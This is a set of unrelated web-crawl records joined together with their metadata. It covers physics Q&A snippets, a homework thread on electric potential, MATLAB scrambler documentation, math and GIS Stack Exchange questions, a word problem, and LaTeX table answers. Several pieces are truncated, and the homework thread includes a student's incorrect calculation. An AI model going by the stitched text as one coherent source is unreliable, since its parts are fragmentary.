theory that should be made. This point is also implicit in David Zaslavsky's answer as well. Rant on effective theories Actually trying to calculate macroscopic properties like "chemistry" from fundamental theories like QCD ... 8 At present, the Navier-Stokes equations for the dynamics of water haven't yet been derived from microscopic principles. 8 Check out Mark Smith's PhD thesis titled Cellular automata methods in mathematical physics, specifically Chapter 4: Lorentz Invariance in Cellular Automata. The conclusion part of the chapter: Symmetry is an important aspect of physical laws, and it is therefore desirable to identify analogous symmetry in CA rules. Furthermore, the most important ... 7 Briefly, The Bohr--planetary model doesn't really address these issues. Bohr, a genius, just asserted that the phenomena at the atomic level were a combination of stationarity while being in an orbit, and discrete quantum jumps between the orbits. It was a postulate that yielded some agreement with experiment and was very helpful for the future ... 7 No. There is nothing wrong with perturbation theory, or with theories with known, restricted accuracy. The point of theory is to explain the results of observation from as simple an initial theoretical standpoint as possible. Therefore: Since experiment always has a finite uncertainty, one can only ask that theory match the experimental value within its ... 7 This is what I think the first bit of the calculation does. Suppose you start with a spherical eye with a hole in it (e.g. the pupil in the human eye): The radius of the eye is$ER$and the radius of the hole is$AR$, and with the length$DA\$ these form a right angled triangle. Pythagoras' theorem tells us: $$DA^2 + AR^2 = ER^2$$ so: $$DA = ... 5 In physics and engineering, we often abstract and idealize a physical problem to gain insight into the physics, e.g., infinite plane of charge, infinite line of charge, point charge, etc. Now, it goes without saying that if these idealizations didn't represent good approximations of relevant physical systems, they wouldn't be used. With regards to your ... 5 Short answer: that depends on your definition of sound theory. For instance, it is possible to find peer-reviewed papers considering such possibilities. The idea that antimatter can be gravitationally repulsed from ordinary matter is definitely not the most popular one. Nevertheless, some people do try to apply it in astrophysical context. Let us have a ... 5 The treatment of electrons as waves has combined with spherical harmonics (below image) to form the foundation for a modern understanding of how electrons "orbit." Tweaks to the spherical harmonic differential equations yields the Schrodinger equation, which yields the accepted models of electron orbital structures: The only element for which the ... 5 Here's my quantitative attempt at 4. and 1.: The Coandă effect here is the tendency of the airflow to adhere to the surface of the ball. This means that near the surface of the ball, the streamlines are curved with a radius of curvature approximately equal to the radius of the ball R; this curvature results in a pressure gradient just as it does in ... 5 Classically emission is continuous and the electron would need to occupy a "in between" energy level for a while, and that is forbidden in Bohr's scheme, so the emission can't be allowed to happen. This doesn't really explain why it can't happen, but that's phenomenology for you: you line keep lining up facts until your kludge (1) gets the right answer and ... 5 General relativity is a classical theory. I will restate your dilemma as follows, since this is how Einstein stated it: We have an abstract manifold consisting of points, vectors that link nearby points, and a metric tensor that tells you the distance between nearby points. What makes these points physical? How can we tell point A apart from point B? Since ... 5 No. Notoriously, supersymmetric string theory has to be formulated in 10 dimensions in order to be consistent. Another example is supergravity, which can be formulated in a maximum of 11 dimensions otherwise it predicts particles with spins higher than two. 5 This is an example from hydrodynamics. When the effects of viscosity can be ignored (inviscid flow), a uniform incident flow can exert on immersed bodies only lift forces perpendicular to the asymptotic flow velocity. However, there exist an infinite number of solutions of the flow equations of motion satisfying the asymptotic conditions at infinity and the ... 4 As an alternative to Christian Blatter's heat interpretation, A might describe the concentration of particles adsorbed onto a one-dimensional substrate surface (or a two-dimensional one, where we ignore one of the dimensions). New particles are adsorbed at rate C_0 per unit length. Adsorbed particles detach from the surface at rate -C_1 per particle. ... 4 There are many physical intuitions often presented in various texts on fluid dynamics. I won't mention those here. I will, however, mention that mathematically the passage from a particle point of view to a continuum point of view is still a largely un-resolved problem. (With suitable interpretation, this problem was already posed by Hilbert as his 6th of 23 ... 4 You can estimate that someone swimming in water has a Reynolds number of about 10^6 - 10^7; what counts is that this number is \gg 1. In that case, you're dealing with the drag equation: http://en.wikipedia.org/wiki/Drag_(physics). If we assume that our swimmer has the same power P on the moon and on Jupiter, his velocity v scales as$$v \propto ... 4 In cellular automata I do know there is explicit dependence on step/time. In quantum mechanics (and other many other theories) it is natural to write local evolution with respect to time. On the contrary, in 'pure' relativity, time is not that different from position. And thus there is no such natural interpretation like 'the next step is the next time'. ... 4 Foundational discussions are indeed somewhat like discussions about religious convictions, as one cannot prove or disprove assumptions and approaches at the foundational level. Moreover, it is in the nature of discussions on the internet that one is likely to get responses mainly from those who either disagree strongly (the case here) or who can add ... Only top voted, non community-wiki answers of a minimum length are eligible
2014-10-31 00:07:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8359317183494568, "perplexity": 504.38377657551456}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1414637898842.15/warc/CC-MAIN-20141030025818-00073-ip-10-16-133-185.ec2.internal.warc.gz"}
https://www.physicsforums.com/threads/electric-potentialfind-the-electric-potential-midway-between-the-two-charges.231429/
Electric PotentialFind the electric potential midway between the two charges 1. Homework Statement A charge q=3.87*(10 to the 9th) Coloumbs is placed at the origin and a second charge equal to -2q is placed on the x axis at the location x=1.5m. (a) Find the electric potential midway between the two charges. (b) THe electric potential vanishes at some point between the two charges. Find the value of x at this point. 2. Homework Equations U=(kq0q)/r U=(kq)/r U= U1 + U2 3. The Attempt at a Solution (a) U=(8.99*(10 to the 9th)(3.87*10to the -9th)(-1.9*10to the -9th))/.75 + U=(9*(10 to the 9th)(-7.74*10to the -9th)(-1.9*10to the -9th))/.75 = 8.2*10to the 10th??????? (b) 0=((8.99*10to the 9th)(???))/r Related Introductory Physics Homework Help News on Phys.org Shooting Star Homework Helper (b) If x is the dist from the origin of the point where the sum of the potentials vanish, then what is the distance of that point from the 2q charge? Just add the two potentials and equate to zero. The value of q and k need not be put while solving. did i do (a) right alphysicist Homework Helper 2. Homework Equations U=(kq0q)/r U=(kq)/r U= U1 + U2 I think you might be confusing two equations. The electric potential energy between a pair of point charges is $$U = \frac{k q_1 q_2}{r}$$ The electric potential at a specified point due to a point charge, which is what you want in this problem, is $$V = \frac{kq}{r}$$ 3. The Attempt at a Solution (a) U=(8.99*(10 to the 9th)(3.87*10to the -9th)(-1.9*10to the -9th))/.75 + U=(9*(10 to the 9th)(-7.74*10to the -9th)(-1.9*10to the -9th))/.75 = 8.2*10to the 10th??????? For the electric potential of a point charge there is only a single charge in the formula, so it looks like you're calculating the electric potential energy instead of the electric potential (although I don't see in the problem where the charge $-1.9\times 10^{-9}$ came from).
2019-12-11 22:32:24
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8284412622451782, "perplexity": 783.4048008556272}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540533401.22/warc/CC-MAIN-20191211212657-20191212000657-00330.warc.gz"}
http://www.mathworks.com/help/comm/ref/comm.scrambler-class.html?requestedDomain=www.mathworks.com&nocookie=true
# Documentation ### This is machine translation Translated by Mouseover text to see original. Click the button below to return to the English verison of the page. To view all translated materals including this page, select Japan from the country navigator on the bottom of this page. # comm.Scrambler System object Package: comm Scramble input signal ## Description The `Scrambler` object scrambles a scalar or column vector input signal. To scramble the input signal: 1. Define and set up your scrambler object. See Construction. 2. Call `step` to scramble the input signal according to the properties of `comm.Scrambler`. The behavior of `step` is specific to each object in the toolbox. Note:   Starting in R2016b, instead of using the `step` method to perform the operation defined by the System object™, you can call the object with arguments, as if it were a function. For example, ```y = step(obj,x)``` and `y = obj(x)` perform equivalent operations. ## Construction `H = comm.Scrambler` creates a scrambler System object, `H`. This object scrambles the input data using a linear feedback shift register that you specify with the Polynomial property. `H = comm.Scrambler(Name,Value)` creates a scrambler object, `H`, with each specified property set to the specified value. You can specify additional name-value pair arguments in any order as (`Name1`,`Value1`,...,`NameN`,`ValueN`). `H = comm.Scrambler(N,POLY,COND,Name,Value)` creates a scrambler object, `H`. This object has the `CalculationBase` property set to `N`, the `Polynomial` property set to `POLY`, the `InitialConditions` property set to `COND`, and the other specified properties set to the specified values. ## Properties `CalculationBase` Range of input data Specify calculation base as a positive, integer, scalar value. Set the calculation base property to one greater than the number of input values. The `step` method input and output integers are in the range [0, CalculationBase–1]. The default is `4`. `Polynomial` Linear feedback shift register connections Specify the polynomial that determines the shift register feedback connections. The default is `'1+ z^-1 + z^-2 + z^-4'`. You can specify the generator polynomial as a character vector or as a numeric, binary vector that lists the coefficients of the polynomial in order of ascending powers of z–1, where p(z–1) = 1 + p1z-1 + p2z-2 + ... is the generator polynomial. The first and last elements must be `1`. Alternatively, you can specify the generator polynomial as a numeric vector. This vector must contain the exponents of z–1 for the nonzero terms of the polynomial, in order of ascending powers of z–1. In this case, the first vector element must be `0`. For example, `'1+ z^-6 + z^-8'`, ```[1 0 0 0 0 0 1 0 1]```, and `[0 -6 -8]` specify the same polynomial $p\left({z}^{-1}\right)=1+{z}^{-6}+{z}^{-8}$. `InitialConditionsSource` Source of initial conditions Specify the source of the `InitialConditions` property as either `Property` or `Input port`. If set to `Input port`, the initial conditions are provided as an input argument to the `step` function. The default value is `Property`. `InitialConditions` Initial values of linear feedback shift register Specify the initial values of the linear feedback shift register as an integer row vector with values in [0 CalculationBase–1]. The default is `[0 1 2 3]`. The length of this property vector must equal the order of the `Polynomial` property vector. This property is available when `InitialConditionsSource` is set to `Property`. `ResetInputPort` Scrambler state reset port Specify the creation of an input port that is used to reset the state of the scrambler. If `ResetInputPort` is `true`, the scrambler is reset when a nonzero input argument is provided to the `step` function. The default value is `false`. This property is available when `InitialConditionsSource` is set to `Property`. ## Methods clone Create scrambler object with same property values getNumInputs Number of expected inputs to step method getNumOutputs Number of outputs from step method isLocked Locked status for input attributes and nontunable properties release Allow property value and input characteristics changes reset Reset states of scrambler object step Scramble input signal ## Examples expand all Scramble and descramble 8-ary data using `comm.Scrambler` and `comm.Descrambler` System objects™ having a calculation base of 8. Create scrambler and descrambler objects while specifying the generator polymomial and initial conditions using name-value pairs. Note that the scrambler and descrambler polynomials are specified with different but equivalent syntaxes. ```N = 8; scrambler = comm.Scrambler(N,'1 + z^-2 + z^-3 + z^-5 + z^-7', ... [0 3 2 2 5 1 7]); descrambler = comm.Descrambler(N,[1 0 1 1 0 1 0 1], ... [0 3 2 2 5 1 7]); ``` Scramble and descramble random integers. Display the original data, scrambled data, and descrambled data sequences. ```data = randi([0 N-1],5,1); scrData = scrambler(data); deScrData = descrambler(scrData); [data scrData deScrData] ``` ```ans = 6 7 6 7 5 7 1 7 1 7 0 7 5 3 5 ``` Verify the descrambled data matches the original data. ```isequal(data,deScrData) ``` ```ans = logical 1 ``` Scramble and descramble quaternary data while changing the initial conditions between function calls. Create scrambler and descrambler System objects™. Set the `InitialConditionsSource` property to `Input port` to be able to set the initial conditions as an argument to the object. ```N = 4; scrambler = comm.Scrambler(N,'1 + z^-3','InitialConditionsSource','Input port'); descrambler = comm.Descrambler(N,'1 + z^-3','InitialConditionsSource','Input port'); ``` Allocate memory for `errVec`. ```errVec = zeros(10,1); ``` Scramble and descramble random integers while changing the initial conditions, `initCond`, each time the loop executes. Use the `symerr` function to determine if the scrambling and descrambing operations result in symbol errors. ```for k = 1:10 initCond = randperm(3)'; data = randi([0 N-1],5,1); scrData = scrambler(data,initCond); deScrData = descrambler(scrData,initCond); errVec(k) = symerr(data,deScrData); end ``` Examine `errVec` to verify that the output from the descrambler matches the original data. ```errVec ``` ```errVec = 0 0 0 0 0 0 0 0 0 0 ``` ## Algorithms This object implements the algorithm, inputs, and outputs described on the Scrambler block reference page. The object properties correspond to the block parameters.
2017-02-26 08:57:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5723865032196045, "perplexity": 1849.5842265188912}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00388-ip-10-171-10-108.ec2.internal.warc.gz"}
https://math.stackexchange.com/questions/4041197/sde-with-constant-coefficients
SDE with constant coefficients So the simplest possible SDE would be $$$$\begin{cases} dX_t = a dt + b dW_t, \text{ with } a,b\in \mathbb{R} \\ X_0 = x_0 \end{cases}$$$$ describing a 1-dimensional stochastic process $$X_t$$ on a probability space $$(\Omega, \mathcal{F}, P)$$ and $$t \in [0,\infty)$$. I know that in this case, the distribution of the solution is a Gaussian. So it is enough to characterize $$\mathbb{E}[X_t]$$ and $$\text{Var}(X_t)$$. Taking the expectation and variance of the equation, I get that $$X_t \sim \mathcal{N}(x_0 + at, b^2t)$$. The problem I am interested in is a piecewise constant SDE, where $$a = \begin{cases} a_1, \text{ if } X_t >0\\ a_2, \text{ if }X_t \leq 0 \end{cases}$$ $$b = \begin{cases} b_1, \text{ if } X_t >0\\ b_2, \text{ if }X_t \leq 0 \end{cases}.$$ How would one "piece together" the two solutions on either side of $$0$$? It would be simple to solve the equation on either side, but I think there would have to be some compatibility equation at 0. One problem I know is that a Brownian motion will hit $$0$$ infinitely many times in a time interval $$[0,\epsilon)$$, which means that each time $$X_t=0$$, there is a small interval where the process may not be well-defined. I was thinking to fix this by stopping the process everytime it hits $$0$$, and restarting it after it "escapes" some neighborhood of 0. Perhaps this could be reframed as a reflected diffusion. Note: there are two relevant solution methods to similar problems that I've seen in the literature, one involving an analytic solution to the constant-coefficients problem (Karatzas and Shreve), and a numerical solution to the reflecting boundary problem (Skorokhod), not sure which is appropriate here. • To answer your parenthetical question: Rather $X_t-X_0$ has the written distribution so that given $X_0=x_0$, $X_t\sim \mathcal{N}(x_0+at, b^2 t)$. – Nap D. Lover Feb 26 at 19:40 • Ah yes, edited! – 900edges Feb 26 at 19:46 You could replace the constant coefficients $$a$$ and $$b$$ with the coefficient functions in terms of indicator functions: $$a(x)=a_1 \cdot \mathbb{1}_{(0, \infty)}(x)+a_2 \cdot \mathbb{1}_{(-\infty, 0]}(x)$$ and a similar expression for $$b$$ but with the constants $$b_1, b_2$$. Then the SDE is $$dX_t=a(X_t)dt+b(X_t)dB_t$$ Here is a simulation of a sample-path via the Euler-Maruyama scheme implemented in R with initial point $$x_0=0$$, total time $$T=1$$, and parameters $$a_1=-0.05$$, $$a_2=0.1$$, $$b_1=0.1$$ and $$b_2=0.3$$ with $$n=1000$$ time-subintervals: and here is one more simulation that crosses the line $$x=0$$ with all the same parameters except starting below zero at $$x_0=-1$$ and running the path for $$T=10$$. If I can derive any analytic information, I will update this post. • @edges900 Indeed, unfortunately, at least at the moment, I cannot find much to say analytically. I added another sample path that starts below zero and eventually crosses $x=0$, just for reference. – Nap D. Lover Feb 26 at 20:28
2021-06-16 23:55:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 30, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.9786014556884766, "perplexity": 191.52554700036256}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487626122.27/warc/CC-MAIN-20210616220531-20210617010531-00283.warc.gz"}
https://gis.stackexchange.com/questions/193778/change-which-default-python-install-runs-py-scripts-a-the-command-prompt
# Change which default python install runs .py scripts a the command prompt I have 3 installations of python on my machine currently, the ArcGIS install, the QGIS install, and an Anaconda install. The Anaconda is the on that I use predominantly. If I run a .py script (checkSource.py) with the following lines at the command prompt I get different results depending how I call it : import sys sys.prefix C:\Users\RDebbout> checkSource.py 'C:\Python27\ArcGISx6410.3' C:\Users\RDebbout> python checkSource.py 'C:\Users\RDebbout\AppData\Local\Continuum\Anaconda' Will running .py scripts at the command line always search for the C:\Python27 install first? Is there a way to change this? I never do anything with the ArcGIS install other than import arcpy into the Anaconda install through the .pth file and would like to keep it sidelined from being used at the command prompt, so if I run a .py file there I want it to default to the Anaconda install, not the Arc install • C:\Python27\ArcGISx6410.3\python.exe C:\Users\RDebbout\checkSource.py etc. – Midavalo May 16 '16 at 18:33 • this is a solution to explicitly call which python to use when running a script, however I am looking for a way to set up my environment variables so that it doesn't find the ArcGIS python when running the .py file. – rickD May 16 '16 at 18:56 start C:\Python27\ArcGIS10.3\python.exe C:\Path\to_the\script\to_run.py
2021-01-22 17:02:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2406206876039505, "perplexity": 4685.391114539145}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703530835.37/warc/CC-MAIN-20210122144404-20210122174404-00382.warc.gz"}
https://www.hackmath.net/en/math-problem/2236
# Flood water Flood waters in some US village meant that the homes had to evacuate 252 people. 50 of them stayed at elementary schools, 61 them slept with their friends and others went to relatives. How many people have gone to relatives? x =  141 ### Step-by-step explanation: $x=252-50-61=141$ Did you find an error or inaccuracy? Feel free to write us. Thank you! ## Related math problems and questions: • There 14 There are 250 people in a museum. 2/5 of the 250 people are girls 3/10 of the 250 people are boys The rest of the 250 people are adults Work out the number of adults in the museum. • Magelang Victims of the cold lava flood disaster in Magelang received donations of 315 sacks of rice. Each sack weighs 50 kg. The rice was distributed equally to 350 families. Each family gets a share of rice as much as …. kg • Ratios Reduce the numbers: 50 in a 1:2 ratio 111 at a ratio of 2:3 70 at 10:50 560 at a ratio of 3:8 • Conference 2 9 people attended a conference on behalf of their company. The conference fee was £520 per person and the company paid a total of £856 in travel costs for the 9 people. How much did the conference cost the company altogether? • Concert On a Concert were sold 150 tickets for CZK 360, 235 tickets for 240 CZK and 412 for 180 CZK. How much was the total revenues for tickets? • Remainders It is given a set of numbers { 170; 244; 299; 333; 351; 391; 423; 644 }. Divide this numbers by number 66 and determine set of remainders. As result write sum of this remainders. • I think number I think number.When I add 841 to it and subtract 157, I get a number that is 22 greater than 996. What number I thinking? • School There are 150 pupils in grade 5 . 2/3 of them are female. By what fractions are the males? • Cottage house The village is 28 km from the cottage. Father goes from village to cottage. Son goes from the cottage to the village. They meet 10 km further behind the cottage. How much did dad walk? • Rectangles How many different rectangles with sides integers (in mm) have a circumference exactly 1000 cm? (a rectangle with sides of 50cm and 450cm is considered to be the same as a rectangle with sides of 450cm and 50cm) • Outside temperature The temperature outside was 57 degree Fahrenheit. During the next few hours it decreased by 18 degrees and then increased by 23 degrees. Find new temperature. • Convalescent homes In 270 convalescent homes, 94,270 vacationers spent part of the holiday a year. On average, how many vacationers per convalescent home? • School year At the beginning of the school year, 396 notebooks and 252 textbooks are ready to be distributed in the classroom. All pupils receive the same number of notebooks and the same amount of textbooks. How many pupils are there in the class if you know that th • Infants water The tank, which has 10 hectoliters of water for infants, went 580 liters in the morning and 340 liters in the afternoon. How many liters left in the tank? • Tablecloths The restaurant has sixty-two square tablecloths with a side length of 150 cm and 36 rectangular tablecloths with dimensions of 140 cm and 160 cm. A) How many meters of hemming ribbon will be needed if we add 50 cm to each tablecloth? B) The ribbon sale in • Tomatoes There were 2414 crates of tomatoes in the barn, but 735 crates of tomatoes were rotten and had to be thrown out. Joe sold 813 crates and canned 756 crates of tomatoes. How many crates of tomatoes does Joe have left? • Four prisms Question No. 1: The prism has the dimensions a = 2.5 cm, b = 100 mm, c = 12 cm. What is its volume? a) 3000 cm2 b) 300 cm2 c) 3000 cm3 d) 300 cm3 Question No.2: The prism base is a rhombus with a side length of 30 cm and a height of 27 cm. The height of t
2021-09-26 16:09:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.27682870626449585, "perplexity": 2201.186461619221}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057882.56/warc/CC-MAIN-20210926144658-20210926174658-00594.warc.gz"}
https://math.stackexchange.com/questions/3827906/how-is-this-special-case-of-this-integral-solved
# How is this special case of this integral solved? I have the following spherical density distribution: $$\rho(x, z) = \frac{1}{\sqrt{x^2 + z^2}\left(1+\sqrt{x^2+z^2}\right)^2}$$ which I have broken into a "line of sight" dimension $$z$$ and a "transverse" dimension $$x$$. Integrating this profile along the line of sight gives the projected 2d density $$\Sigma$$: $$\Sigma(x) = 2\int_0^\infty\rho(x,z)dz$$ I wish to compute this for any generic upper bound $$\zeta$$, i.e. $$\Sigma(x; \zeta) = 2\int_0^\zeta\rho(x,z)dz$$ (that is, $$\zeta=\infty$$ corresponds to the case of projecting the entire distribution to the transverse plane, while $$\zeta<\infty$$ corresponds to a projection which is truncated in the $$z$$-dimension). It turns out this has to be solved piecewise; the solution for $$x>1$$, via Mathematica 11.3, is $$\left.\int_0^\zeta\rho(x, z)dz\right\rvert_{x>1} = \frac{\zeta \left(\sqrt{x^2+\zeta^2}-1\right)}{\left(x^2-1\right) \left(x^2+\zeta^2-1\right)}+\frac{\tan ^{-1}\left(\frac{\zeta}{\sqrt{\left(x^2-1\right) \left(x^2+\zeta^2\right)}}\right)-\tan ^{-1}\left(\frac{\zeta}{\sqrt{x^2-1}}\right)}{\left(x^2-1\right)^{3/2}}$$ However, I am unable to obtain the solution for the case $$x<1$$. I currently only have access to Mathematica 12.0, rather than 11.3 which reproduces the form above, and it is failing on this integral. Performing Assuming[{x < 1, ζ \[Element] Reals, ζ > 0}, FullSimplify[Integrate[1/(Sqrt[x^2 + z^2] (1 + Sqrt[x^2 + z^2])^2), {z, 0, ζ}]]] returns a HyperGeometric function, though I suspect that the $$x<1$$ case should not be much more complicated than $$x>1$$. Can anyone confirm? Or see any issue? • Please make titles informative as to the content of the post, not as to the mental state of the person posting them at the time they are posting them. Sep 16 '20 at 1:09 • A question about Mathematica may better be suited for mathematica.stackexchange.com Sep 16 '20 at 1:48 • @ArturoMagidin apologies; fixed Sep 16 '20 at 5:02 WolframAlpha is giving me, on the substitution $$z = x\tan\theta$$ - $$\int\rho(x, z)dz = \frac{x\sin\theta}{\left(x^2-1\right) \left(\cos\theta+x\right)} - \frac{2\tanh^{-1}\left(\frac{x-1}{\sqrt{1-x^2}}\tan\frac{\theta}{2}\right)}{(1- x^2)^{3/2}} + C$$
2021-12-08 16:28:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 17, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7762264013290405, "perplexity": 692.9794331859738}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363515.28/warc/CC-MAIN-20211208144647-20211208174647-00080.warc.gz"}
https://tex.stackexchange.com/tags/tables/hot
Last call to make your voice heard! Our 2022 Developer Survey closes in less than a week. Take survey. # Tag Info ## Hot answers tagged tables ### LaTeX table not working One possible solution: wider \textwidth determined by use of the geometry package footnotesize font size different widths of columns use of the tabularray package \documentclass{article} \usepackage{... • 251k ### makecell: how to reduce the line spacing in multiline cells? With use of the tabularray package is simple: \documentclass[12pt]{article} \usepackage{tabularray} \begin{document} \begin{tblr}{cells=l, rowsep=3pt} foobar &... • 251k Accepted ### makecell: how to reduce the line spacing in multiline cells? • 260k Accepted ### Make all lines of tables thicker Second edit: if you prefer to use the classic tabular, \setlength{\arrayrulewidth}{5pt} before the array seems to do the trick too. Edit: following your comment below, here's a version that should be ... • 839 ### tabular: thicker lines Here is what you can do with {NiceTabular} of nicematrix. \documentclass{article} \usepackage{nicematrix,tikz} \begin{document} \NiceMatrixOptions { custom-line = { letter = B, ... • 25.1k Accepted ### How to highlight the first column of Table? I used the packages xcolor and colortbl to define a color Higlight and a new column type h. This produces: Here is the code: \documentclass[12pt]{report} \usepackage{xcolor,colortbl} \definecolor{... • 895 Accepted ### Colorcells and Rowcolor in spreadtab It is quite easy to customize styles of tables while using spreadtab if you would like to use tblr environment of tabularray package: \documentclass[a4paper,14pt]{extreport} \usepackage{spreadtab} \... • 7,886 Accepted ### Figure with two graphics and one matrix You can exploit the fact that a tabular is vertically centered with respect to the baseline (actually, not exactly, but it's not so important). \documentclass{article} \usepackage{amsmath} \usepackage{... • 986k 1 vote ### Tabular environment malfunctioning: incorrect order and whitespace With use of the tabularray and adjustbox package, font size small and without resizing of table: \documentclass{article} \usepackage[margin=25mm]{geometry} \usepackage{tabularray} \usepackage[export]{... • 251k 1 vote ### Error in making table with multiple columns I suggest you employ a matrix environment (provided by the amsmath package) in an unnumbered displayed equation instead of a tabular environment embedded in a center environment. \documentclass{... • 435k 1 vote ### Figure with two graphics and one matrix With tabularray and adjustbox packages: \documentclass{article} \usepackage{amsmath} \usepackage[export]{adjustbox} \usepackage{tabularray} \begin{document} \begin{figure} \centering \begin{tblr}{... • 251k 1 vote Accepted ### Text width inside a table I suggest the macro \twoboards with six parameters: title,boad,moves of left image and title,board,moves of right image. We need not any tabular environment. Each \twoboards is \centerline with two ... • 52.5k 1 vote ### Text width inside a table You didn't properly set your tabular and margins. I define a new column type P which has fix width and center alignment. I set the margin to 2cm(top,bottom,left and right) and showed the page frame ... • 1,970 1 vote Accepted ### Generate tabularray and compute sub-result for each row using functional library To avoid potential naming conflicts with commands in LaTeX kernel and other packages, functional package has changed its naming scheme for functions from 